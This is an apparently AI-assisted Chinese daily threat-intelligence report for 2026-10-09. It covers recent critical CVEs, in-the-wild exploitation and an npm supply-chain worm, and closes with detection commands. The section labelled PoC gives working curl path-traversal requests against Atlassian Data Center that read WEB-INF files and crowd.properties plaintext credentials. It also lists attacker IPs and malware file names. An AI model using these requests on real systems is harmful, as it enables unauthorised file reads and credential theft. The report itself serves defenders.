
每日安全情报报告 · 2026-10-09由 AI 整理发布一、报告摘要与风险概览本期聚焦2026-10-07 ~ 2026-10-09新增/升级披露的高危漏洞与威胁。本期最大信号Atlassian Data Center 未授权文件读取CVE-2026-21589在公开 PoC 后数小时内即遭在野利用且已被 VulnCheck 列入 KEVAhsayCBS 双漏洞CVE-2026-105133/105134自 10-07 起遭实战利用投放 webshell 与 XMRigCisco 单日披露 35 个漏洞含 NX-OS 5 个 9.8 根权限 RCE 与 License On-Prem 一个 10.0 输入验证缺陷SonicWall SMA1000 出现 10.0 预认证 SSRFSecuShare Pro 出现 9.8 未认证命令注入。供应链侧tensorlake npm 官方 SDK 投毒Shai-Hulud 蠕虫正在窃取开发者凭据。风险等级数量代表项 紧急在野利用2CVE-2026-21589AtlassianKEV、CVE-2026-105134AhsayCBS实战投毒 严重CVSS 9.8–10.0暂无在野证据但影响面大6CVE-2026-76482、Cisco NX-OS 5 连、CVE-2026-102255、CVE-2026-107459、CVE-2026-105192、Fanvil X7A 高危供应链/恶意软件/中危 RCE3tensorlake 投毒、PoeLLM、Splunk 三严重二、最新高危漏洞近 24–48 小时 [紧急 · 已在野利用] CVE-2026-21589 — Atlassian Data Center 未授权任意文件读取漏洞类型路径遍历 / 任意文件读取CWE-22受影响组件Atlassian 全家桶 Data Center 自托管版——Jira Software、Jira Service Management、Confluence、Bitbucket、Bamboo、Crowd、Crucible、Fisheye所有版本均受影响Cloud 版已修复CVSS9.3Critical⚠️ 在野利用watchTowr 于 10-06 发布技术研究与公开 PoC 后Previdian 蜜网在 2 小时内即捕获利用尝试VulnCheck 于 10-07 将其加入 KEV 列表SANS ISC 观测到来自 DigitalOcean IP 段的大规模扫描134.199.x / 137.184.x / 146.190.x / 159.223.x 等。利用源 IP38.60.157[.]86、146.70.187[.]234、159.26.119[.]225。利用条件无需认证但需知道目标文件精确路径。根因是共享atlassian-plugins-webresource库将::双重解码为/构造出../遍历原语。在 Crowd 集成部署中可读取WEB-INF/classes/crowd.properties明文凭据进而通过 Crowd API 创建 Jira 管理员账户实现身份系统接管。修复各产品已发布修复版本如 Jira 9.12.40 / 10.3.26 / 11.3.12Confluence 9.2.26 / 10.2.19Bitbucket 9.4.26 / 10.2.8 等。临时缓解WAF/反代拦截..邻接/、\、::含%2e%2e%2f、%3a%3a编码Confluence/Jira/JSM/Bamboo/Crowd 启用 Tomcat RewriteValveBitbucket 配置 urlrewrite.xml 规则。链接Atlassian 官方公告 · watchTowr 技术研究与 PoC · Rapid7 ETR 分析 · SANS ISC 扫描观测 · NVD 详情 [紧急 · 实战投毒] CVE-2026-105133 / CVE-2026-105134 — AhsayCBS 认证绕过 未认证 RCE漏洞类型CVE-2026-105133 不当认证中危CVE-2026-105134 认证绕过导致未认证远程代码执行严重以 NT AUTHORITY/SYSTEM 运行受影响组件AhsayCBS 备份管理控制台 ≤ 10.3.4MSP 集中备份平台CVSSCVE-2026-105134 为10.0⚠️ 在野利用Huntress 自2026-10-07 23:20 UTC起观测到攻击者利用该漏洞对暴露主机实施 RCE截至 10-08 已波及 5 家组织。攻击链先用 105133 绕过认证再用 105134 在 Web 目录写入 JSP webshell并植入伪装成 Microsoft Edge 的 XMRig 挖矿程序甚至部署监控任务管理器、深夜自动关闭的 AI 辅助 PowerShell 脚本。修复截至发稿 Ahsay 尚未发布补丁。临时措施限制管理接口公网暴露排查失陷迹象异常cbssvcX64.exe子进程、%TEMP% 下Taskgmr.ps1/msedge.exe/edge.exe/config.json等。链接Huntress 实战分析 · NVD CVE-2026-105134 · NVD CVE-2026-105133 [严重] CVE-2026-76482 — Cisco License On-Prem 输入验证不当漏洞类型不当输入验证CWE-347关联缺失认证/凭据保护不足受影响组件Cisco License On-Prem原 Smart Software Manager On-Prem≤ 10-2026089-202601 及更早需迁移CVSS10.0Critical利用状态Cisco 内部安全审查发现暂无已知在野利用。修复升级至10-202609无临时规避方案旧 SSM 品牌版本不会获得补丁需迁移。链接Cisco 安全公告 · NVD 详情同批 hardening 项CVE-2026-76480缺失认证9.8、CVE-2026-76483凭据保护不足9.1、CVE-2026-76484代码注入8.8另 CVE-2026-20328、CVE-2026-76454 为未认证远程可达的 API/密码重置缺陷。 [严重] Cisco NX-OS 五连击 — Nexus 交换机根权限 RCECVSS 9.8漏洞类型输入验证不足导致的未认证远程代码执行 / DoSCWE-122 等受影响组件Nexus 3000 / 9000 系列standalone NX-OS 模式CVSS5 项均为9.8启用条件决定是否可利用CVE-2026-76471NX-API默认关闭发送畸形 HTTP 请求CVE-2026-76485 / 76486 / 76501需启用 NGOAM发送畸形 IP 包76486 还需 SRv6 或 NV Overlay76501 需 SRv6CVE-2026-76465需启用 MPLS OAM默认关闭发送畸形 MPLS echo 请求利用状态Cisco 内部测试发现暂无已知在野利用Nexus 7000 与 ACI 模式不受影响。修复用 Cisco Software Checker 查固定版本无法立即升级的可禁用相关特性或用 Cisco Live Protect 临时防护。链接Cisco NX-OS 公告 · NVD CVE-2026-76471 [严重] CVE-2026-102255 — SonicWall SMA1000 预认证 SSRF漏洞类型服务端请求伪造SSRFCWE-918受影响组件SonicWall SMA1000 系列6210 / 7210 / 8200v≤ 12.4.3-03526 或 ≤ 12.5.0-02952CVSS10.0Critical预认证利用状态SonicWall 称暂无在野利用证据但全球有 400 台 SMA1000 暴露公网且该系列 2026 年已多次遭勒索软件利用。修复升级至 12.5.0-03082 或 12.4.3-03670。附带项CVE-2026-102256认证后 OS 命令注入 RCE、CVE-2026-102257Zip Slip 路径遍历、CVE-2026-102258存储型 XSS。链接SonicWall PSIRT SNWLID-2026-0017 · BleepingComputer 分析 · NVD 详情 [严重] CVE-2026-107459 — Openfind SecuShare Pro 未认证 OS 命令注入漏洞类型OS 命令注入CWE-78受影响组件Openfind SecuShare Pro v4企业文件共享/文档管理平台仅本地/定制部署受影响MailCloudEaaS云版已更新CVSS9.8CVSS 3.1/ 9.3CVSS 4.0利用状态TWCERT/CC 于 10-08 发布TVN-202610001暂无公开 PoC、无技术细节、无在野证据。单个 HTTP 请求即可执行命令无需凭据。修复联系 Openfind 技术支持获取版本更新无临时规避方案。链接ThreatAft 技术分析 · NVD 详情 [严重 · 无补丁] CVE-2026-105192 — LMCache 未认证 pickle 反序列化 RCE漏洞类型不安全反序列化CWE-502通过未认证 ZeroMQ 传输触发pickle.loads远程代码执行受影响组件LMCache 0.3.9 ~ 0.5.5含 0.5.6rc3 及开发分支multiprocess/distributed 模式且--host绑定到可路由地址如 0.0.0.0时暴露 TCP 5555CVSS9.8另一独立缺陷CVE-2026-107204/run_script HTTP 端点沙箱逃逸 RCECVSS 9.3同期披露利用状态JFrog 于 10-07 发布 PoC单条未认证 ZeroMQ DEALER 消息即可触发官方容器镜像以 root 运行成功利用即获 root。截至发稿无官方补丁。临时缓解避免--host绑定可路由地址保持 localhost用防火墙/K8s NetworkPolicy 限制 5555 端口仅允许 worker pod降低进程权限。链接JFrog 安全研究 · LMCache GitHub Issue #5510/run_script 沙箱逃逸 · NVD CVE-2026-105192 [严重] Splunk Enterprise 三处严重漏洞漏洞类型任意命令执行、未授权访问、代码注入具体 CVE 编号以厂商公告为准受影响组件Splunk Enterprise、MCP Server、Add-on for AWS利用状态Splunk 已发布修复暂无在野利用报告。链接Splunk 安全公告 [高危 · 供应链] tensorlake npm 官方 SDK 投毒Shai-Hulud 蠕虫事件tensorlake 官方 TypeScript SDK 的0.5.144版本10-08 发布后已从 npm 下架在preinstall钩子中植入自传播凭据窃取蠕虫自动收割 npm/GitHub token、AWS、Vault、K8s、SSH、.env、加密钱包以及 Claude Code/Cursor/Kiro/Windsurf/Zed 的 MCP 配置并通过 republish 受害者包、植入恶意 GitHub Actions、写入.claude/settings.json与.vscode/tasks.json实现持久化与传播。处置立即卸载 0.5.144轮换该机器上的所有凭据属 ChainDrop / Shai-Hulud 攻击行动。链接The Hacker News 报道 · Socket 分析 · StepSecurity 分析 · GitHub Issue #1014 [高危] 其他近期高危项速览Fanvil X7A / PA2S管理端口诊断 ping 工具未认证命令注入CVE-2025-70518X7ACVSS10.0、CVE-2025-70521X7A PA2SCVSS 9.8固件 2.6.0.1182建议从不可信网络移除管理访问。来源DarkPoint 披露PoeLLM 恶意软件感染3400 台暴露的 AI 服务器LiteLLM/Ollama/Gotenberg/Gitea 等用于门罗币挖矿C2 地址隐藏。来源BleepingComputer.gh / .sl / .as 国家顶级域注册局被入侵攻击者篡改权威 DNS 记录并通过 CA 域名验证为 Google 等域名签发未授权 HTTPS 证书Chrome 已通过 CRLSet 拦截Google 配合撤销。来源BleepingComputer三、最新漏洞 PoC / 利用与检测步骤说明标注「PoC」为可直接复现的利用示例标注「检测/版本核查」为防御侧排查命令非攻击利用。1. [PoC] Atlassian CVE-2026-21589 — 未授权任意文件读取含 Crowd 接管PoC A手动利用已验证的请求形态来自 SANS ISC 捕获的实战扫描# 读取 Jira 的 WEB-INF/web.xmlTomcat 必需文件等价于应用内 /etc/passwd curl -k https://TARGET/jira/download/..%3a%3aWEB-INF/web.xml # 读取 Crowd 集成部署中的明文凭据可导致 Jira 管理员接管 curl -k https://TARGET/jira/download/..%3a%3aWEB-INF/classes/crowd.properties # SANS ISC 观测到的其他实战遍历形态 curl -k https://TARGET/s/1.0//download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..%3a%3a..%3a%3a..%3a%3a..%3a%3a..%3a%3aWEB-INF::urlrewrite.xmlPoC BNuclei 自动化检测需克隆官方模板库# 1) 克隆 Nuclei 社区模板库 git clone https://github.com/projectdiscovery/nuclei-templates.git cd nuclei-templates # 2) 安装 nuclei如未安装 go install -v github.com/projectdiscovery/nuclei/v3/cmd/nucleilatest # 或pipx install nuclei视发行版而定 # 3) 对目标批量扫描使用 CVE-2026-21589 相关模板 nuclei -u https://TARGET -tags cve-2026-21589 -silent # 也可对资产列表扫描 nuclei -l targets.txt -tags cve-2026-21589 -o results.txt参考projectdiscovery/nuclei-templates · watchTowr 免费扫描器GitHub · Rapid7 ETR防御建议上述命令仅授权于自有资产做合规排查临时缓解与固定版本见第二节。2. [检测/版本核查] LMCache CVE-2026-105192 / CVE-2026-107204# 1) 检查主机/容器内是否监听 5555multiprocess ZMQ 端口 ss -ltnp | grep 5555 # 容器内 docker exec container ss -ltnp | grep 5555 # 2) 检查启动脚本/Helm values/K8s manifest 是否使用了 --host 可路由地址 grep -Rni lmcache ./deploy | grep -i host grep -Rni 5555 ./deploy # 3) 确认进程运行权限官方镜像默认 root需降权 ps aux | grep -i lmcache # 4) 关注 /run_script HTTP API 是否启用并可达CVE-2026-107204 curl -k -m 5 https://TARGET:8000/run_script -X POST -d {code:}参考LMCache GitHub Issue #5510 · JFrog 研究 · NVD CVE-2026-105192修复前禁止--host绑定 0.0.0.0仅限 localhost用防火墙/NetworkPolicy 限制 5555。3. [检测/版本核查] AhsayCBS CVE-2026-105133/105134在野失陷排查# 1) 确认版本是否 ≤ 10.3.4含 10.3.4均已受影响 # 登录 AhsayCBS 控制台 - 关于/版本信息 # 2) 检查异常子进程cbssvcX64.exe 派生可疑命令 Get-Process -Name cbssvcX64 -ErrorAction SilentlyContinue # Linux 部署 ps aux | grep -i ahsay # 3) 检查 %TEMP% / /tmp 下恶意落盘文件 ls -la %TEMP% | findstr /i Taskgmr msedge edge config.json # 同时排查 /var/lib/ahsay 等目录下异常 .jsp webshell # 4) 检查是否有伪装成 Edge 的 XMRig 进程与对外挖矿连接 netstat -ano | findstr /i ESTABLISHED | findstr /i :3333 :8080 :443参考Huntress 实战报告含 IoC注意本项目无公开利用脚本——上述为防御侧检测Ahsay 截至发稿未发布补丁务必限制管理接口公网暴露。4. [检测/版本核查] SonicWall SMA1000 CVE-2026-102255 暴露面核查# 1) 确认设备型号与版本6210/7210/8200v且为 12.4.3-03526 或 12.5.0-02952 及更早 # 登录 AMC - System - Appliance Status 查看固件版本 # 2) 公网暴露面核查确认 WorkPlace 接口是否可从互联网到达 nmap -p 443 --script ssl-cert TARGET_IP curl -k -m 5 https://TARGET/ -o /dev/null -w %{http_code}\n # 3) 升级至已修复版本 # 12.4.3-03526 - 12.4.3-03670 或更高 # 12.5.0-02952 - 12.5.0-03082 或更高参考SonicWall PSIRT · Aviatrix 攻击路径分析5. [检测/版本核查] Cisco NX-OS CVE-2026-76471NX-API特性检查# 在 Nexus 3000/9000standalone NX-OS上确认 NX-API 是否启用 switch# show feature | include nxapi # 示例输出已启用 nxapi 1 enabled # 检查 NGOAM / MPLS OAM另两项触发条件 switch# show feature | include ngoam switch# show feature | include mpls # 无明确固定版本时用 Cisco Software Checker 定位升级版本 # https://sec.cloudapps.cisco.com/security/center/softwarechecker.x # 临时缓解不需要时执行 no feature nx-api / no feature mpls oam或用 Cisco Live Protect 临时防护参考Cisco NX-OS 公告 · NVD CVE-2026-764716. [检测/版本核查] SecuShare Pro CVE-2026-107459 补丁核查# 1) 确认是否为本地/定制部署的 SecuShare Pro v4云版 MailCloud/EaaS 不受影响 # 登录管理控制台 - 系统信息查看版本 # 2) 目前无公开 PoC 与临时规避方案唯一缓解为联系 Openfind 升级 # 运维侧将管理接口置于内网限制来源 IP监控异常 HTTP 请求命令注入特征参考ThreatAft 分析 · TWCERT/CC TVN-202610001四、网络安全最新文章与深度阅读The Hacker News — Tensorlake npm 官方包投毒投递 Shai-Hulud 凭据窃取蠕虫2026-10-08摘要官方 tensorlake SDK 0.5.144 在 preinstall 钩子植入自传播蠕虫窃取 npm/GitHub/AWS/Vault/SSH 及 AI 编码工具 MCP 配置并通过重发布受害者包与恶意 CI 工作流扩散。阅读原文Huntress — 威胁者利用 AhsayCBS 严重漏洞投放 Webshell 与 XMRig 挖矿程序2026-10-08摘要自 10-07 起实战利用 CVE-2026-105133/105134链式认证绕过 未认证 RCE落盘 JSP webshell 与伪装 Edge 的挖矿程序已波及多家 MSP。阅读原文BleepingComputer — SonicWall 警告 SMA1000 网关最大严重级 SSRF 漏洞2026-10-08摘要CVE-2026-102255CVSS 10.0预认证 SSRF影响 6210/7210/8200v全球 400 台暴露公网修复版本 12.5.0-03082 / 12.4.3-03670。阅读原文BleepingComputer — PoeLLM 恶意软件感染 3400 台暴露的 AI 服务器进行挖矿2026-10-08摘要Black Lotus Labs 披露新型 Linux 恶意软件 PoeLLM针对 LiteLLM/Ollama/Gotenberg/Gitea 等暴露的 AI 与开发基础设施单日峰值约 800 台活跃。阅读原文The Hacker News — .gh/.sl/.as 国家顶级域注册局被入侵为 Google 等域名签发未授权证书2026-10-08摘要攻击者篡改加纳、塞拉利昂、美属萨摩亚 ccTLD 权威 DNS通过 CA 域名验证签发 Google 等品牌 HTTPS 证书Google 系统未被直接入侵Chrome 已通过 CRLSet 拦截。阅读原文The Hacker News — LibreOffice / OpenOffice 特殊代码执行链2026-10-08摘要CVE-2026-63277LibreOffice与 CVE-2026-59265Apache OpenOffice构成无需宏即可触发的恶意文档执行链。阅读原文SANS Internet Storm Center — 针对 Atlassian CVE-2026-21589 的扫描观测2026-10-06/07摘要披露后蜜网捕获来自 DigitalOcean IP 段的大规模利用扫描给出真实攻击 URL 形态与源 IP 列表佐证在野利用已规模化。阅读原文Rapid7 — Emergent Threat ResponseAtlassian CVE-2026-21589 未授权任意文件访问2026-10摘要评级 9.3Critical提供受影响产品矩阵、日志检测正则与缓解指南建议跳出常规补丁周期紧急修复。阅读原文部分内容由 AI 辅助生成